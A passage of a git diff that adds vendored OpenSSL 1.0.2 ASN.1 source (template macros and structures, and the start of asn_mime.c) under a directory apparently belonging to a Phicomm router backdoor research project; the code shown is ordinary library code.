+# define ASN1_OPT(stname, field, type) ASN1_EX_TYPE(ASN1_TFLG_OPTIONAL, 0, stname, field, type)
+
+/* IMPLICIT tagged simple type */
+# define ASN1_IMP(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, 0)
+
+/* IMPLICIT tagged OPTIONAL simple type */
+# define ASN1_IMP_OPT(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
+
+/* Same as above but EXPLICIT */
+
+# define ASN1_EXP(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, 0)
+# define ASN1_EXP_OPT(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
+
+/* SEQUENCE OF type */
+# define ASN1_SEQUENCE_OF(stname, field, type) \
+                ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, stname, field, type)
+
+/* OPTIONAL SEQUENCE OF */
+# define ASN1_SEQUENCE_OF_OPT(stname, field, type) \
+                ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
+
+/* Same as above but for SET OF */
+
+# define ASN1_SET_OF(stname, field, type) \
+                ASN1_EX_TYPE(ASN1_TFLG_SET_OF, 0, stname, field, type)
+
+# define ASN1_SET_OF_OPT(stname, field, type) \
+                ASN1_EX_TYPE(ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
+
+/* Finally compound types of SEQUENCE, SET, IMPLICIT, EXPLICIT and OPTIONAL */
+
+# define ASN1_IMP_SET_OF(stname, field, type, tag) \
+                        ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
+
+# define ASN1_EXP_SET_OF(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
+
+# define ASN1_IMP_SET_OF_OPT(stname, field, type, tag) \
+                        ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
+
+# define ASN1_EXP_SET_OF_OPT(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
+
+# define ASN1_IMP_SEQUENCE_OF(stname, field, type, tag) \
+                        ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
+
+# define ASN1_IMP_SEQUENCE_OF_OPT(stname, field, type, tag) \
+                        ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
+
+# define ASN1_EXP_SEQUENCE_OF(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
+
+# define ASN1_EXP_SEQUENCE_OF_OPT(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
+
+/* EXPLICIT using indefinite length constructed form */
+# define ASN1_NDEF_EXP(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_NDEF)
+
+/* EXPLICIT OPTIONAL using indefinite length constructed form */
+# define ASN1_NDEF_EXP_OPT(stname, field, type, tag) \
+                        ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL|ASN1_TFLG_NDEF)
+
+/* Macros for the ASN1_ADB structure */
+
+# define ASN1_ADB(name) \
+        static const ASN1_ADB_TABLE name##_adbtbl[]
+
+# ifndef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+#  define ASN1_ADB_END(name, flags, field, app_table, def, none) \
+        ;\
+        static const ASN1_ADB name##_adb = {\
+                flags,\
+                offsetof(name, field),\
+                app_table,\
+                name##_adbtbl,\
+                sizeof(name##_adbtbl) / sizeof(ASN1_ADB_TABLE),\
+                def,\
+                none\
+        }
+
+# else
+
+#  define ASN1_ADB_END(name, flags, field, app_table, def, none) \
+        ;\
+        static const ASN1_ITEM *name##_adb(void) \
+        { \
+        static const ASN1_ADB internal_adb = \
+                {\
+                flags,\
+                offsetof(name, field),\
+                app_table,\
+                name##_adbtbl,\
+                sizeof(name##_adbtbl) / sizeof(ASN1_ADB_TABLE),\
+                def,\
+                none\
+                }; \
+                return (const ASN1_ITEM *) &internal_adb; \
+        } \
+        void dummy_function(void)
+
+# endif
+
+# define ADB_ENTRY(val, template) {val, template}
+
+# define ASN1_ADB_TEMPLATE(name) \
+        static const ASN1_TEMPLATE name##_tt
+
+/*
+ * This is the ASN1 template structure that defines a wrapper round the
+ * actual type. It determines the actual position of the field in the value
+ * structure, various flags such as OPTIONAL and the field name.
+ */
+
+struct ASN1_TEMPLATE_st {
+    unsigned long flags;        /* Various flags */
+    long tag;                   /* tag, not used if no tagging */
+    unsigned long offset;       /* Offset of this field in structure */
+# ifndef NO_ASN1_FIELD_NAMES
+    const char *field_name;     /* Field name */
+# endif
+    ASN1_ITEM_EXP *item;        /* Relevant ASN1_ITEM or ASN1_ADB */
+};
+
+/* Macro to extract ASN1_ITEM and ASN1_ADB pointer from ASN1_TEMPLATE */
+
+# define ASN1_TEMPLATE_item(t) (t->item_ptr)
+# define ASN1_TEMPLATE_adb(t) (t->item_ptr)
+
+typedef struct ASN1_ADB_TABLE_st ASN1_ADB_TABLE;
+typedef struct ASN1_ADB_st ASN1_ADB;
+
+struct ASN1_ADB_st {
+    unsigned long flags;        /* Various flags */
+    unsigned long offset;       /* Offset of selector field */
+    STACK_OF(ASN1_ADB_TABLE) **app_items; /* Application defined items */
+    const ASN1_ADB_TABLE *tbl;  /* Table of possible types */
+    long tblcount;              /* Number of entries in tbl */
+    const ASN1_TEMPLATE *default_tt; /* Type to use if no match */
+    const ASN1_TEMPLATE *null_tt; /* Type to use if selector is NULL */
+};
+
+struct ASN1_ADB_TABLE_st {
+    long value;                 /* NID for an object or value for an int */
+    const ASN1_TEMPLATE tt;     /* item for this value */
+};
+
+/* template flags */
+
+/* Field is optional */
+# define ASN1_TFLG_OPTIONAL      (0x1)
+
+/* Field is a SET OF */
+# define ASN1_TFLG_SET_OF        (0x1 << 1)
+
+/* Field is a SEQUENCE OF */
+# define ASN1_TFLG_SEQUENCE_OF   (0x2 << 1)
+
+/*
+ * Special case: this refers to a SET OF that will be sorted into DER order
+ * when encoded *and* the corresponding STACK will be modified to match the
+ * new order.
+ */
+# define ASN1_TFLG_SET_ORDER     (0x3 << 1)
+
+/* Mask for SET OF or SEQUENCE OF */
+# define ASN1_TFLG_SK_MASK       (0x3 << 1)
+
+/*
+ * These flags mean the tag should be taken from the tag field. If EXPLICIT
+ * then the underlying type is used for the inner tag.
+ */
+
+/* IMPLICIT tagging */
+# define ASN1_TFLG_IMPTAG        (0x1 << 3)
+
+/* EXPLICIT tagging, inner tag from underlying type */
+# define ASN1_TFLG_EXPTAG        (0x2 << 3)
+
+# define ASN1_TFLG_TAG_MASK      (0x3 << 3)
+
+/* context specific IMPLICIT */
+# define ASN1_TFLG_IMPLICIT      ASN1_TFLG_IMPTAG|ASN1_TFLG_CONTEXT
+
+/* context specific EXPLICIT */
+# define ASN1_TFLG_EXPLICIT      ASN1_TFLG_EXPTAG|ASN1_TFLG_CONTEXT
+
+/*
+ * If tagging is in force these determine the type of tag to use. Otherwise
+ * the tag is determined by the underlying type. These values reflect the
+ * actual octet format.
+ */
+
+/* Universal tag */
+# define ASN1_TFLG_UNIVERSAL     (0x0<<6)
+/* Application tag */
+# define ASN1_TFLG_APPLICATION   (0x1<<6)
+/* Context specific tag */
+# define ASN1_TFLG_CONTEXT       (0x2<<6)
+/* Private tag */
+# define ASN1_TFLG_PRIVATE       (0x3<<6)
+
+# define ASN1_TFLG_TAG_CLASS     (0x3<<6)
+
+/*
+ * These are for ANY DEFINED BY type. In this case the 'item' field points to
+ * an ASN1_ADB structure which contains a table of values to decode the
+ * relevant type
+ */
+
+# define ASN1_TFLG_ADB_MASK      (0x3<<8)
+
+# define ASN1_TFLG_ADB_OID       (0x1<<8)
+
+# define ASN1_TFLG_ADB_INT       (0x1<<9)
+
+/*
+ * This flag means a parent structure is passed instead of the field: this is
+ * useful is a SEQUENCE is being combined with a CHOICE for example. Since
+ * this means the structure and item name will differ we need to use the
+ * ASN1_CHOICE_END_name() macro for example.
+ */
+
+# define ASN1_TFLG_COMBINE       (0x1<<10)
+
+/*
+ * This flag when present in a SEQUENCE OF, SET OF or EXPLICIT causes
+ * indefinite length constructed encoding to be used if required.
+ */
+
+# define ASN1_TFLG_NDEF          (0x1<<11)
+
+/* This is the actual ASN1 item itself */
+
+struct ASN1_ITEM_st {
+    char itype;                 /* The item type, primitive, SEQUENCE, CHOICE
+                                 * or extern */
+    long utype;                 /* underlying type */
+    const ASN1_TEMPLATE *templates; /* If SEQUENCE or CHOICE this contains
+                                     * the contents */
+    long tcount;                /* Number of templates if SEQUENCE or CHOICE */
+    const void *funcs;          /* functions that handle this type */
+    long size;                  /* Structure size (usually) */
+# ifndef NO_ASN1_FIELD_NAMES
+    const char *sname;          /* Structure name */
+# endif
+};
+
+/*-
+ * These are values for the itype field and
+ * determine how the type is interpreted.
+ *
+ * For PRIMITIVE types the underlying type
+ * determines the behaviour if items is NULL.
+ *
+ * Otherwise templates must contain a single
+ * template and the type is treated in the
+ * same way as the type specified in the template.
+ *
+ * For SEQUENCE types the templates field points
+ * to the members, the size field is the
+ * structure size.
+ *
+ * For CHOICE types the templates field points
+ * to each possible member (typically a union)
+ * and the 'size' field is the offset of the
+ * selector.
+ *
+ * The 'funcs' field is used for application
+ * specific functions.
+ *
+ * For COMPAT types the funcs field gives a
+ * set of functions that handle this type, this
+ * supports the old d2i, i2d convention.
+ *
+ * The EXTERN type uses a new style d2i/i2d.
+ * The new style should be used where possible
+ * because it avoids things like the d2i IMPLICIT
+ * hack.
+ *
+ * MSTRING is a multiple string type, it is used
+ * for a CHOICE of character strings where the
+ * actual strings all occupy an ASN1_STRING
+ * structure. In this case the 'utype' field
+ * has a special meaning, it is used as a mask
+ * of acceptable types using the B_ASN1 constants.
+ *
+ * NDEF_SEQUENCE is the same as SEQUENCE except
+ * that it will use indefinite length constructed
+ * encoding if requested.
+ *
+ */
+
+# define ASN1_ITYPE_PRIMITIVE            0x0
+
+# define ASN1_ITYPE_SEQUENCE             0x1
+
+# define ASN1_ITYPE_CHOICE               0x2
+
+# define ASN1_ITYPE_COMPAT               0x3
+
+# define ASN1_ITYPE_EXTERN               0x4
+
+# define ASN1_ITYPE_MSTRING              0x5
+
+# define ASN1_ITYPE_NDEF_SEQUENCE        0x6
+
+/*
+ * Cache for ASN1 tag and length, so we don't keep re-reading it for things
+ * like CHOICE
+ */
+
+struct ASN1_TLC_st {
+    char valid;                 /* Values below are valid */
+    int ret;                    /* return value */
+    long plen;                  /* length */
+    int ptag;                   /* class value */
+    int pclass;                 /* class value */
+    int hdrlen;                 /* header length */
+};
+
+/* Typedefs for ASN1 function pointers */
+
+typedef ASN1_VALUE *ASN1_new_func(void);
+typedef void ASN1_free_func(ASN1_VALUE *a);
+typedef ASN1_VALUE *ASN1_d2i_func(ASN1_VALUE **a, const unsigned char **in,
+                                  long length);
+typedef int ASN1_i2d_func(ASN1_VALUE *a, unsigned char **in);
+
+typedef int ASN1_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len,
+                        const ASN1_ITEM *it, int tag, int aclass, char opt,
+                        ASN1_TLC *ctx);
+
+typedef int ASN1_ex_i2d(ASN1_VALUE **pval, unsigned char **out,
+                        const ASN1_ITEM *it, int tag, int aclass);
+typedef int ASN1_ex_new_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
+typedef void ASN1_ex_free_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+typedef int ASN1_ex_print_func(BIO *out, ASN1_VALUE **pval,
+                               int indent, const char *fname,
+                               const ASN1_PCTX *pctx);
+
+typedef int ASN1_primitive_i2c(ASN1_VALUE **pval, unsigned char *cont,
+                               int *putype, const ASN1_ITEM *it);
+typedef int ASN1_primitive_c2i(ASN1_VALUE **pval, const unsigned char *cont,
+                               int len, int utype, char *free_cont,
+                               const ASN1_ITEM *it);
+typedef int ASN1_primitive_print(BIO *out, ASN1_VALUE **pval,
+                                 const ASN1_ITEM *it, int indent,
+                                 const ASN1_PCTX *pctx);
+
+typedef struct ASN1_COMPAT_FUNCS_st {
+    ASN1_new_func *asn1_new;
+    ASN1_free_func *asn1_free;
+    ASN1_d2i_func *asn1_d2i;
+    ASN1_i2d_func *asn1_i2d;
+} ASN1_COMPAT_FUNCS;
+
+typedef struct ASN1_EXTERN_FUNCS_st {
+    void *app_data;
+    ASN1_ex_new_func *asn1_ex_new;
+    ASN1_ex_free_func *asn1_ex_free;
+    ASN1_ex_free_func *asn1_ex_clear;
+    ASN1_ex_d2i *asn1_ex_d2i;
+    ASN1_ex_i2d *asn1_ex_i2d;
+    ASN1_ex_print_func *asn1_ex_print;
+} ASN1_EXTERN_FUNCS;
+
+typedef struct ASN1_PRIMITIVE_FUNCS_st {
+    void *app_data;
+    unsigned long flags;
+    ASN1_ex_new_func *prim_new;
+    ASN1_ex_free_func *prim_free;
+    ASN1_ex_free_func *prim_clear;
+    ASN1_primitive_c2i *prim_c2i;
+    ASN1_primitive_i2c *prim_i2c;
+    ASN1_primitive_print *prim_print;
+} ASN1_PRIMITIVE_FUNCS;
+
+/*
+ * This is the ASN1_AUX structure: it handles various miscellaneous
+ * requirements. For example the use of reference counts and an informational
+ * callback. The "informational callback" is called at various points during
+ * the ASN1 encoding and decoding. It can be used to provide minor
+ * customisation of the structures used. This is most useful where the
+ * supplied routines *almost* do the right thing but need some extra help at
+ * a few points. If the callback returns zero then it is assumed a fatal
+ * error has occurred and the main operation should be abandoned. If major
+ * changes in the default behaviour are required then an external type is
+ * more appropriate.
+ */
+
+typedef int ASN1_aux_cb(int operation, ASN1_VALUE **in, const ASN1_ITEM *it,
+                        void *exarg);
+
+typedef struct ASN1_AUX_st {
+    void *app_data;
+    int flags;
+    int ref_offset;             /* Offset of reference value */
+    int ref_lock;               /* Lock type to use */
+    ASN1_aux_cb *asn1_cb;
+    int enc_offset;             /* Offset of ASN1_ENCODING structure */
+} ASN1_AUX;
+
+/* For print related callbacks exarg points to this structure */
+typedef struct ASN1_PRINT_ARG_st {
+    BIO *out;
+    int indent;
+    const ASN1_PCTX *pctx;
+} ASN1_PRINT_ARG;
+
+/* For streaming related callbacks exarg points to this structure */
+typedef struct ASN1_STREAM_ARG_st {
+    /* BIO to stream through */
+    BIO *out;
+    /* BIO with filters appended */
+    BIO *ndef_bio;
+    /* Streaming I/O boundary */
+    unsigned char **boundary;
+} ASN1_STREAM_ARG;
+
+/* Flags in ASN1_AUX */
+
+/* Use a reference count */
+# define ASN1_AFLG_REFCOUNT      1
+/* Save the encoding of structure (useful for signatures) */
+# define ASN1_AFLG_ENCODING      2
+/* The Sequence length is invalid */
+# define ASN1_AFLG_BROKEN        4
+
+/* operation values for asn1_cb */
+
+# define ASN1_OP_NEW_PRE         0
+# define ASN1_OP_NEW_POST        1
+# define ASN1_OP_FREE_PRE        2
+# define ASN1_OP_FREE_POST       3
+# define ASN1_OP_D2I_PRE         4
+# define ASN1_OP_D2I_POST        5
+# define ASN1_OP_I2D_PRE         6
+# define ASN1_OP_I2D_POST        7
+# define ASN1_OP_PRINT_PRE       8
+# define ASN1_OP_PRINT_POST      9
+# define ASN1_OP_STREAM_PRE      10
+# define ASN1_OP_STREAM_POST     11
+# define ASN1_OP_DETACHED_PRE    12
+# define ASN1_OP_DETACHED_POST   13
+
+/* Macro to implement a primitive type */
+# define IMPLEMENT_ASN1_TYPE(stname) IMPLEMENT_ASN1_TYPE_ex(stname, stname, 0)
+# define IMPLEMENT_ASN1_TYPE_ex(itname, vname, ex) \
+                                ASN1_ITEM_start(itname) \
+                                        ASN1_ITYPE_PRIMITIVE, V_##vname, NULL, 0, NULL, ex, #itname \
+                                ASN1_ITEM_end(itname)
+
+/* Macro to implement a multi string type */
+# define IMPLEMENT_ASN1_MSTRING(itname, mask) \
+                                ASN1_ITEM_start(itname) \
+                                        ASN1_ITYPE_MSTRING, mask, NULL, 0, NULL, sizeof(ASN1_STRING), #itname \
+                                ASN1_ITEM_end(itname)
+
+/* Macro to implement an ASN1_ITEM in terms of old style funcs */
+
+# define IMPLEMENT_COMPAT_ASN1(sname) IMPLEMENT_COMPAT_ASN1_type(sname, V_ASN1_SEQUENCE)
+
+# define IMPLEMENT_COMPAT_ASN1_type(sname, tag) \
+        static const ASN1_COMPAT_FUNCS sname##_ff = { \
+                (ASN1_new_func *)sname##_new, \
+                (ASN1_free_func *)sname##_free, \
+                (ASN1_d2i_func *)d2i_##sname, \
+                (ASN1_i2d_func *)i2d_##sname, \
+        }; \
+        ASN1_ITEM_start(sname) \
+                ASN1_ITYPE_COMPAT, \
+                tag, \
+                NULL, \
+                0, \
+                &sname##_ff, \
+                0, \
+                #sname \
+        ASN1_ITEM_end(sname)
+
+# define IMPLEMENT_EXTERN_ASN1(sname, tag, fptrs) \
+        ASN1_ITEM_start(sname) \
+                ASN1_ITYPE_EXTERN, \
+                tag, \
+                NULL, \
+                0, \
+                &fptrs, \
+                0, \
+                #sname \
+        ASN1_ITEM_end(sname)
+
+/* Macro to implement standard functions in terms of ASN1_ITEM structures */
+
+# define IMPLEMENT_ASN1_FUNCTIONS(stname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, stname, stname)
+
+# define IMPLEMENT_ASN1_FUNCTIONS_name(stname, itname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, itname)
+
+# define IMPLEMENT_ASN1_FUNCTIONS_ENCODE_name(stname, itname) \
+                        IMPLEMENT_ASN1_FUNCTIONS_ENCODE_fname(stname, itname, itname)
+
+# define IMPLEMENT_STATIC_ASN1_ALLOC_FUNCTIONS(stname) \
+                IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(static, stname, stname, stname)
+
+# define IMPLEMENT_ASN1_ALLOC_FUNCTIONS(stname) \
+                IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, stname, stname)
+
+# define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(pre, stname, itname, fname) \
+        pre stname *fname##_new(void) \
+        { \
+                return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
+        } \
+        pre void fname##_free(stname *a) \
+        { \
+                ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
+        }
+
+# define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname) \
+        stname *fname##_new(void) \
+        { \
+                return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
+        } \
+        void fname##_free(stname *a) \
+        { \
+                ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
+        }
+
+# define IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, fname) \
+        IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
+        IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
+
+# define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
+        stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
+        { \
+                return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
+        } \
+        int i2d_##fname(stname *a, unsigned char **out) \
+        { \
+                return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
+        }
+
+# define IMPLEMENT_ASN1_NDEF_FUNCTION(stname) \
+        int i2d_##stname##_NDEF(stname *a, unsigned char **out) \
+        { \
+                return ASN1_item_ndef_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(stname));\
+        }
+
+/*
+ * This includes evil casts to remove const: they will go away when full ASN1
+ * constification is done.
+ */
+# define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
+        stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
+        { \
+                return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
+        } \
+        int i2d_##fname(const stname *a, unsigned char **out) \
+        { \
+                return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
+        }
+
+# define IMPLEMENT_ASN1_DUP_FUNCTION(stname) \
+        stname * stname##_dup(stname *x) \
+        { \
+        return ASN1_item_dup(ASN1_ITEM_rptr(stname), x); \
+        }
+
+# define IMPLEMENT_ASN1_PRINT_FUNCTION(stname) \
+        IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, stname, stname)
+
+# define IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, itname, fname) \
+        int fname##_print_ctx(BIO *out, stname *x, int indent, \
+                                                const ASN1_PCTX *pctx) \
+        { \
+                return ASN1_item_print(out, (ASN1_VALUE *)x, indent, \
+                        ASN1_ITEM_rptr(itname), pctx); \
+        }
+
+# define IMPLEMENT_ASN1_FUNCTIONS_const(name) \
+                IMPLEMENT_ASN1_FUNCTIONS_const_fname(name, name, name)
+
+# define IMPLEMENT_ASN1_FUNCTIONS_const_fname(stname, itname, fname) \
+        IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
+        IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
+
+/* external definitions for primitive types */
+
+DECLARE_ASN1_ITEM(ASN1_BOOLEAN)
+DECLARE_ASN1_ITEM(ASN1_TBOOLEAN)
+DECLARE_ASN1_ITEM(ASN1_FBOOLEAN)
+DECLARE_ASN1_ITEM(ASN1_SEQUENCE)
+DECLARE_ASN1_ITEM(CBIGNUM)
+DECLARE_ASN1_ITEM(BIGNUM)
+DECLARE_ASN1_ITEM(LONG)
+DECLARE_ASN1_ITEM(ZLONG)
+
+DECLARE_STACK_OF(ASN1_VALUE)
+
+/* Functions used internally by the ASN1 code */
+
+int ASN1_item_ex_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
+void ASN1_item_ex_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
+int ASN1_template_new(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
+int ASN1_primitive_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+void ASN1_template_free(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
+int ASN1_template_d2i(ASN1_VALUE **pval, const unsigned char **in, long len,
+                      const ASN1_TEMPLATE *tt);
+int ASN1_item_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len,
+                     const ASN1_ITEM *it, int tag, int aclass, char opt,
+                     ASN1_TLC *ctx);
+
+int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out,
+                     const ASN1_ITEM *it, int tag, int aclass);
+int ASN1_template_i2d(ASN1_VALUE **pval, unsigned char **out,
+                      const ASN1_TEMPLATE *tt);
+void ASN1_primitive_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype,
+                const ASN1_ITEM *it);
+int asn1_ex_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                int utype, char *free_cont, const ASN1_ITEM *it);
+
+int asn1_get_choice_selector(ASN1_VALUE **pval, const ASN1_ITEM *it);
+int asn1_set_choice_selector(ASN1_VALUE **pval, int value,
+                             const ASN1_ITEM *it);
+
+ASN1_VALUE **asn1_get_field_ptr(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
+
+const ASN1_TEMPLATE *asn1_do_adb(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt,
+                                 int nullerr);
+
+int asn1_do_lock(ASN1_VALUE **pval, int op, const ASN1_ITEM *it);
+
+void asn1_enc_init(ASN1_VALUE **pval, const ASN1_ITEM *it);
+void asn1_enc_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
+int asn1_enc_restore(int *len, unsigned char **out, ASN1_VALUE **pval,
+                     const ASN1_ITEM *it);
+int asn1_enc_save(ASN1_VALUE **pval, const unsigned char *in, int inlen,
+                  const ASN1_ITEM *it);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.c
new file mode 100644
index 0000000..7e2f28e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.c
@@ -0,0 +1,973 @@
+/* asn_mime.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include "asn1_locl.h"
+
+/*
+ * Generalised MIME like utilities for streaming ASN1. Although many have a
+ * PKCS7/CMS like flavour others are more general purpose.
+ */
+
+/*
+ * MIME format structures Note that all are translated to lower case apart
+ * from parameter values. Quotes are stripped off
+ */
+
+typedef struct {
+    char *param_name;           /* Param name e.g. "micalg" */
+    char *param_value;          /* Param value e.g. "sha1" */
+} MIME_PARAM;
+
+DECLARE_STACK_OF(MIME_PARAM)
+IMPLEMENT_STACK_OF(MIME_PARAM)
+
+typedef struct {
+    char *name;                 /* Name of line e.g. "content-type" */
+    char *value;                /* Value of line e.g. "text/plain" */
+    STACK_OF(MIME_PARAM) *params; /* Zero or more parameters */
+} MIME_HEADER;
+
+DECLARE_STACK_OF(MIME_HEADER)
+IMPLEMENT_STACK_OF(MIME_HEADER)
+
+static int asn1_output_data(BIO *out, BIO *data, ASN1_VALUE *val, int flags,
+                            const ASN1_ITEM *it);
+static char *strip_ends(char *name);
+static char *strip_start(char *name);
+static char *strip_end(char *name);
+static MIME_HEADER *mime_hdr_new(char *name, char *value);
+static int mime_hdr_addparam(MIME_HEADER *mhdr, char *name, char *value);
+static STACK_OF(MIME_HEADER) *mime_parse_hdr(BIO *bio);
+static int mime_hdr_cmp(const MIME_HEADER *const *a,
+                        const MIME_HEADER *const *b);
+static int mime_param_cmp(const MIME_PARAM *const *a,
+                          const MIME_PARAM *const *b);
+static void mime_param_free(MIME_PARAM *param);
+static int mime_bound_check(char *line, int linelen, char *bound, int blen);
+static int multi_split(BIO *bio, char *bound, STACK_OF(BIO) **ret);
+static int strip_eol(char *linebuf, int *plen);
+static MIME_HEADER *mime_hdr_find(STACK_OF(MIME_HEADER) *hdrs, char *name);
+static MIME_PARAM *mime_param_find(MIME_HEADER *hdr, char *name);
+static void mime_hdr_free(MIME_HEADER *hdr);
+
+#define MAX_SMLEN 1024
+#define mime_debug(x)           /* x */
+
+/* Output an ASN1 structure in BER format streaming if necessary */
+
+int i2d_ASN1_bio_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
+                        const ASN1_ITEM *it)
+{
+    /* If streaming create stream BIO and copy all content through it */
+    if (flags & SMIME_STREAM) {
+        BIO *bio, *tbio;
+        bio = BIO_new_NDEF(out, val, it);
+        if (!bio) {
